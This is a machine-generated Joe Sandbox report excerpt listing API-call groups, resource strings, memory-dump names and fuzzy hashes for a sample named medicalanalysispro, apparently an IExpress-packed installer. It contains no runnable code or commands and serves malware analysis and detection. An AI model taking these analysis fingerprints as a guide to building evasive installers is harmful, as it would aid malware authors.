                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 975904313-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                                                                                                                                                                                                                • Instruction ID: bb12e2d6146e14835d796d372adecd1f5739927c2b535e1b331c2679df5062c1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94518861A1C6C5C6FB216F2594143B9FB91EB49B90F888171CA4E07B8ACF3CF4558730
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                                                                                                                                                                                                                                                                                                • Instruction ID: e79e99fab1aabd9e14c24c86544f5564bfaa6d0d5d013e04d75674b0833d4e9b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53317E36B14641CAE7109B65E8049ADBBA0F78DB99F999130CE0A57B49CF3DE4458B20
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5078
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5089
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50AF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LoadResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50C0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LockResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50CF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: memcpy_s.MSVCRT ref: 00007FF7600A50EE
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FreeResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50FD
                                                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7600A3139), ref: 00007FF7600A3F95
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF7600A4018
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: LoadStringA.USER32 ref: 00007FF7600A4E60
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: MessageBoxA.USER32 ref: 00007FF7600A4EA0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7700: GetLastError.KERNEL32 ref: 00007FF7600A7704
                                                                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7600A3139), ref: 00007FF7600A403E
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00007FF7600A3139), ref: 00007FF7600A409F
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7AC8: FindResourceA.KERNEL32 ref: 00007FF7600A7AF2
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7AC8: LoadResource.KERNEL32 ref: 00007FF7600A7B09
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7600A7B3F
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7AC8: FreeResource.KERNEL32 ref: 00007FF7600A7B51
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF7600A4078
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                                                                                • Opcode ID: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4ee99429c8f130cf8ce3470f38ea2fe5baa4932d589543d97e616b79fd4f27b0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9310A76A29602C6F710AB20A85577AB660FB85785FC04135D90E4AF9ADF7DB0258B30
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A114C: _vsnprintf.MSVCRT ref: 00007FF7600A1189
                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A7763
                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A7772
                                                                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A77B8
                                                                                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A77EC
                                                                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7600A606F), ref: 00007FF7600A7805
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                                                                                                                                                                                                                • Instruction ID: 604f412cf993ca30e47354f2bf4e560652d5d170c573664e5b00d79db8830b2e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24315432A08A41C6EB10AB25A800179FBA1FF89B50FD58635DA5E07B9DCF3DF555C720
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3370778649-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                                                                                                                                                                                                                • Instruction ID: 748e7794fc4a7a0b37514e587923f8900dd284c12e5aacb0a4a365ac1cb94fd1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE111A65708B81C7EB146B62A444179FAA0FB4EFC1F899138DD0E47B59DE3DE4518720
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                                                                                • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                                                                                                                                                                                                                • Instruction ID: 067ef070ba51e3318f8908a8a3c3d520b70a24a62c5f8e6e1e1a83ea4b71c32d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35112C32B04A81D7E720AB25E8543AAB6A1FBCD704F858131DA4E46B59DF3CE519CB20
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                                                                                                                                                                                                                • String ID: ham
                                                                                                                                                                                                                                                                                                                • API String ID: 761066910-4133487753
                                                                                                                                                                                                                                                                                                                • Opcode ID: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                                                                                                                                                                                                                                                                                                • Instruction ID: ef6636fe7d816f08639b63f978e03057ba655a8e369a5061b6fc17d38de0924d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53f545d9e0ff8d341fef1ad6af6e18a944f324add3d94d70d3143487fc889582
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8110060E08742C6F7597B65A4092B8EA51EB8EB41FD49131E90E06B9ECF3DB464C730
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5078
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5089
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50AF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LoadResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50C0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LockResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50CF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: memcpy_s.MSVCRT ref: 00007FF7600A50EE
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FreeResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50FD
                                                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7600A3388), ref: 00007FF7600A4975
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7600A3388), ref: 00007FF7600A4A11
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: LoadStringA.USER32 ref: 00007FF7600A4E60
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: MessageBoxA.USER32 ref: 00007FF7600A4EA0
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: <None>$@$FINISHMSG
                                                                                                                                                                                                                                                                                                                • API String ID: 3507850446-4126004490
                                                                                                                                                                                                                                                                                                                • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5756ec1b9e04482ca79f15c37681682b5188e0d3834e13bd5ec6544e5515a47d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04118776B08642C7F7206B20E45177AF650FBC5794F849135DA4D46F8ADF3DE1148B24
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 438848745-2381869747
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9a78da8f3990f46e530d2cbd78e241856d8708331746d34e3224425745eab655
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23115131A19682D6EA61AB10D8503FDB7A0FB99704FC45271C65D02BAADF3DF629C730
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                                                                                                                                                                                                                                                                                                • Instruction ID: bfdafb32c5531b09a0935db4eac531031d3d61c359196b9d3bb79a2a49ca4f22
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73116321E08A85C6EA506B24F4053B9E7A1FBC9B64F854231CA5E06BDACF3CE0558770
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                                                                                                                                                                                                                                                                • String ID: ham
                                                                                                                                                                                                                                                                                                                • API String ID: 2312377310-4133487753
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                                • API String ID: 1065093856-1193786559
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: *MEMCAB
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3211172518
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                                                                                                                                                                                                                • Instruction ID: f5ab3a57a88fb8425ac6086fa8cfca38423bd63dfe822b7b0a8892b0013c5215
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28117762E08A81C5FB555B21A904279EB91E749FF1F89C274DA5E07B8ECF2CE4508730
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
• Instruction ID: 5a38a284d8c9186513179ddee78e2d3f4a821635e8cdd06234f91d05db3926e9
• Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
